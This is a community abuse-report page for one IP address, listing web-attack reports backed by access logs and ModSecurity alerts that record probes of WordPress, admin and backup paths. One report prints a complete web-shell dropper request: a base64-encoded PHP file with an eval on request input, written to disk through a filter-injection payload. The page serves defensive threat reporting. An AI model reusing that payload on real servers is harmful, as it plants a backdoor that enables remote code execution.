๐บ๐ฆ
URAN Publishing Service
2026-07-21 18:26:40
(5 hours ago)
172.70.143.134 - - [21/Jul/2026:21:20:10 +0300] "GET /wp-includes/PHPMailer/ HTTP/1.1" 404 770 "-" " ...
show more
172.70.143.134 - - [21/Jul/2026:21:20:10 +0300] "GET /wp-includes/PHPMailer/ HTTP/1.1" 404 770 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
172.70.143.134 - - [21/Jul/2026:21:26:39 +0300] "GET /wp-includes/html-api/ HTTP/1.1" 404 770 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
...
show less
Web App Attack
๐บ๐ธ
mawan
2026-07-17 07:16:55
(4 days ago)
Suspected of having performed illicit activity on LAX server.
Web App Attack
๐บ๐ธ
mawan
2026-07-11 21:19:40
(1 week ago)
Suspected of having performed illicit activity on LAX server.
Web App Attack
๐ง๐ฌ
Stoyko Stoykov
2026-07-10 20:02:55
(1 week ago)
172.70.143.134 - - [10/Jul/2026:23:02:54 +0300] "GET /admin/file-manager/initialize HTTP/2.0" 404 13 ...
show more
172.70.143.134 - - [10/Jul/2026:23:02:54 +0300] "GET /admin/file-manager/initialize HTTP/2.0" 404 134 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
...
show less
Hacking
Web App Attack
๐ฆ๐บ
oncord
2026-06-24 04:46:25
(3 weeks ago)
Form spam
Web Spam
๐ฉ๐ช
abdubhai
2026-06-14 01:38:29
(1 month ago)
172.70.143.134 - - [14/Jun/2026:
...
Brute-Force
๐ฉ๐ช
Zydzy
2026-06-05 23:33:10
(1 month ago)
Automated attack detected. Server: 95.140.154.181. Jail: nginx-exploit.
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-05-10 02:35:24
(2 months ago)
(mod_security) mod_security (id:210730) triggered by 172.70.143.134 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:210730) triggered by 172.70.143.134 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat May 09 22:35:16.389104 2026] [security2:error] [pid 11736:tid 11736] [client 172.70.143.134:13650] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||alexetjeremy.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "alexetjeremy.com"] [uri "/backup.sql"] [unique_id "af_u5KkJdRZhRCjuj62IHgAAAAo"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ฎ๐ฉ
Burayot
2026-04-07 16:29:29
(3 months ago)
LF_MODSEC: (mod_security) mod_security (id:949110) triggered by 172.70.143.134 (SG/Singapore/-): 1 i ...
show more
LF_MODSEC: (mod_security) mod_security (id:949110) triggered by 172.70.143.134 (SG/Singapore/-): 1 in the last 3600 secs
show less
Web App Attack
๐บ๐ธ
mawan
2026-03-19 13:42:07
(4 months ago)
Suspected of having performed illicit activity on LAX server.
Web App Attack
๐บ๐ธ
AbuseIPDB
AbuseIPDB Official
2026-02-02 04:50:36
(5 months ago)
Suspicious Operation. Request content:
s=file_put_contents('bxs.php',base64_decode('R2lmODlhPD9waHAg ...
show more
Suspicious Operation. Request content:
s=file_put_contents('bxs.php',base64_decode('R2lmODlhPD9waHAgY2xhc3MgR1lVSjlnN2wgeyBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJEg3elgzKXsgQGV2YWwoIi8qWjdDYzR1cldWOSovIi4kSDd6WDMuIi8qWjdDYzR1cldWOSovIik7IH19bmV3IEdZVUo5ZzdsKCRfUkVRVUVTVFsnNGs0ZDY2NiddKTs%2FPg%3D%3D'))&_method=__construct&method=POST&filter[]=assert
show less
Web App Attack
๐ฉ๐ช
Blexyel
2025-10-14 02:46:14
(9 months ago)
172.70.143.134 - - [14/Oct/2025:02:46:11 +0000] "GET /wp-login.php HTTP/1.1" 404 548 "-" "Mozilla/5. ...
show more
172.70.143.134 - - [14/Oct/2025:02:46:11 +0000] "GET /wp-login.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
...
show less
Brute-Force
Web App Attack
๐จ๐ณ
ThreatBook.io
2025-08-29 23:05:11
(10 months ago)
2025-08-29 22:28:03 /docs/config/realm.html
2025-08-29 22:27:26 /docs/security-howto.html
2025-08-29 ...
show more
2025-08-29 22:28:03 /docs/config/realm.html
2025-08-29 22:27:26 /docs/security-howto.html
2025-08-29 22:30:40 /docs/config/resources.html
show less
Web App Attack
๐ช๐ธ
el-brujo
2025-08-27 01:24:20
(10 months ago)
27/Aug/2025:03:24:19.797682 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client ...
show more
27/Aug/2025:03:24:19.797682 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 172.70.143.134] ModSecurity: Warning. Matched phrase "Dockerfile" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: Dockerfile found within REQUEST_FILENAME: /cursos/udemy - docker mastery with kubernetes swarm from a docker captain/10 - swarm app lifecycle/84 - healthchecks in dockerfiles german.srt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "el-hacker.org"] [uri "/Cursos/Udemy - Docker Mastery with Kubernetes Swarm from a Docker Captain/10 - Swarm App Lifecycle/84 - Healthchecks in Dockerfiles German.srt"] [unique_id "aK5eQ4aYWeNpfXMIGg9FMQAAAYs"
...
show less
Hacking
Web App Attack
๐ฎ๐ฉ
hermawan
2025-08-19 00:01:09
(11 months ago)
[Tue Aug 19 06:57:40.321936 2025] [security2:error] [pid 543416:tid 139620825114304] [client 172.70. ...
show more
[Tue Aug 19 06:57:40.321936 2025] [security2:error] [pid 543416:tid 139620825114304] [client 172.70.143.134:11528] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "CF-Connecting-IP" at REQUEST_HEADERS_NAMES:Cf-Connecting-Ip. [file "/etc/modsecurity/coreruleset-4.16.0/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "375"] [id "440005"] [msg "BAD REQUEST_HEADERS_NAMES - Detected and Blocked"] [data "Matched Data: CF-Connecting-IP found within REQUEST_HEADERS_NAMES:Cf-Connecting-Ip: Cf-Connecting-Ip request_line = GET /images/Klimatologi/Infografis/Infografis-Iklim/Dasarian/2018/11/Infografis-Dasarian_Update_10_November_2018.jpg HTTP/2.0"] [severity "NOTICE"] [hostname "staklim-jatim.bmkg.go.id"] [uri "/images/Klimatologi/Infografis/Infografis-Iklim/Dasarian/2018/11/Infografis-Dasarian_Update_10_November_2018.jpg"] [unique_id "aKO99Edj7qNrK-_iFIG2aQAASgw"] [staklim-jatim.bmkg.go.id] [staklim-jatim.bmkg.go.id] top=[543429] [gNQ4gSwXkS0] [aKO99Edj7qNrK-_iFIG2aQAASgw]
...
show less
Hacking
Web App Attack